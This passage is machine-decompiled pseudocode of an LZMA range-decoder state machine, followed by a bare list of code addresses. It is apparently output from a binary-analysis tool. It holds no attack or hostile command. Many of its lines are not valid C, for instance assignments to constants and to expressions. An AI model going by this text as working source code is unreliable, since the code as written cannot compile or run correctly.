											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x004064b8
0x004064b8
0x004064b8
0x004064b8
0x004064be
0x004064c2
0x004064c6
0x004064d0
0x004064de
0x004067b4
0x004067b4
0x004067b7
0x004067be
0x004067eb
0x004067eb
0x004067ef
0x00000000
0x00000000
0x004067f1
0x004067fa
0x00406800
0x00406803
0x00406806
0x00406809
0x0040680c
0x00406812
0x0040682b
0x0040682e
0x0040683a
0x0040683b
0x0040683e
0x00406814
0x00406814
0x00406823
0x00406826
0x00406826
0x00406848
0x004067e8
0x004067e8
0x004067e8
0x004067eb
0x004067ef
0x00000000
0x00000000
0x00000000
0x0040684a
0x0040684a
0x004067c3
0x004067c7
0x004068ff
0x004068ff
0x00406909
0x00406911
0x00406918
0x0040691a
0x00406921
0x00406925
0x00406925
0x004067cd
0x004067d3
0x004067da
0x004067e2
0x004067e2
0x004067e5
0x00000000
0x004067e5
0x0040684f
0x0040685c
0x0040685f
0x0040676b
0x0040676b
0x0040676b
0x00405f07
0x00405f07
0x00405f07
0x00405f10
0x00000000
0x00000000
0x00405f16
0x00405f16
0x00000000
0x00405f1d
0x00405f21
0x00000000
0x00000000
0x00405f27
0x00405f2a
0x00405f2d
0x00405f30
0x00405f34
0x00000000
0x00000000
0x00405f3a
0x00405f3a
0x00405f3d
0x00405f3f
0x00405f40
0x00405f43
0x00405f45
0x00405f46
0x00405f48
0x00405f4b
0x00405f50
0x00405f55
0x00405f5e
0x00405f71
0x00405f74
0x00405f80
0x00405fa8
0x00405faa
0x00405fb8
0x00405fb8
0x00405fbc
0x00000000
0x00000000
0x00000000
0x00000000
0x00405fac
0x00405fac
0x00405faf
0x00405fb0
0x00405fb0
0x00000000
0x00405fac
0x00405f82
0x00405f86
0x00405f8b
0x00405f8b
0x00405f94
0x00405f9c
0x00405f9f
0x00000000
0x00405fa5
0x00405fa5
0x00000000
0x00405fa5
0x00000000
0x00405fc2
0x00405fc2
0x00405fc6
0x00406872
0x00406872
0x00000000
0x00406872
0x00405fcc
0x00405fcf
0x00405fdf
0x00405fe2
0x00405fe5
0x00405fe5
0x00405fe5
0x00405fe8
0x00405fec
0x00000000
0x00000000
0x00405fee
